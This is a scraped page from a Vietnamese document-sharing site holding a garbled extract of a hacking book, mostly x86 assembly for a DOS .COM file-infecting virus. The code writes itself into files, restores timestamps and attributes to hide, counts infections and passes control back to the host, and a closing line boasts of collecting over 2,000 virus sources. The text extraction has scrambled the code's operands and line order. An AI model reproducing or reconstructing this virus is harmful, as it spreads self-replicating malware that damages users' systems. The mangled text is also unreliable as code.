tailieunhanh - Hack Attacks Revealed A Complete Reference with Custom Security Hacking Toolkit phần 9

Chúng tôi nhận ra bạn là một chuyên nghiệp bận rộn với thời hạn để đạt. Cho dù mục tiêu của bạn là để tìm hiểu một công nghệ mới hoặc giải quyết một vấn đề quan trọng, chúng tôi muốn có được cho vay bạn một bàn tay. | save_jmp_displacement sub 3 jmp disp. mov ax bp 3 file size - jmp _disp ax write_code mov mov lea int ah cx dx 21h 40h virus bp _length start . equate goto_bof mov xor xor int ax cx dx 21h 4200h cx dx write_jmp mov mov lea int ah cx dx 21h 40h 3 bp jmp_code to file inc bp infections restore_date_time mov ax mov cx mov dx int 21h 5701h bp bp dta_file_ dta_file_ time date close_file mov int ah 21h 3eh restore_attrib xor mov butes mov lea int ch cl ax dx 21h ch bp 4301h bp dta_file_ dta_file_ attrib name restore original attri done_infecting mov cmp jz jmp ah ah bomb find bp bp _next infections max_infections bomb cmp je bp 0 restore_ path original run 651 ----Stuff deleted restore _path mov lea int ah dx 21h 3bh bp root when path stored not included th mov lea int ah dx 21h 3bh bp org _path cd to original pa restore _dta mov mov int ah dx 21h 1ah bp old _dta_off restore _3_bytes lea mov cld mov rep si bp di 10 0h cx 3 movsb _3_ bytes in memory auto-inc si di returnj prog control_ cmp je mov jmp or_exit bp 0 exit di 100h di bp 0 if original run return control back to - cs 100h exit mov int ax 21h 4c00h -------- Variable Declarations old_dta_off dress dw 0 offset of old dta ad dta record dta_filler db dta_file_attrib db dta_file_time dw dta_file_date dw dta_file_size dd dta_file_name db 21 dup 0 0 0 0 0 13 dup 0 search_mask OM db .COM 0 files to infect .C search_attrib comcom dw db 00100111b all files a s h r 652 previous_dir db . 0 root db 0 org_path db 64 dup 0 original path infections db 0 counter max_infections db 1 _3_bytes db 0 0 0 jmp_code db 0E9h jmp_disp dw 0 last_chars db 0 0 do last chars ID virus_id db AZ eov end of virus virus_length equ offset eov - offset start end start Eventually I accumulated GB worth of hacker secrets and had amassed the source for more than 2 000 well-known as well as some lesser known nasty infectors of every derivative approximately 2 MB of the GB . Looking back I believe the rush of being part of a secret .

TỪ KHÓA LIÊN QUAN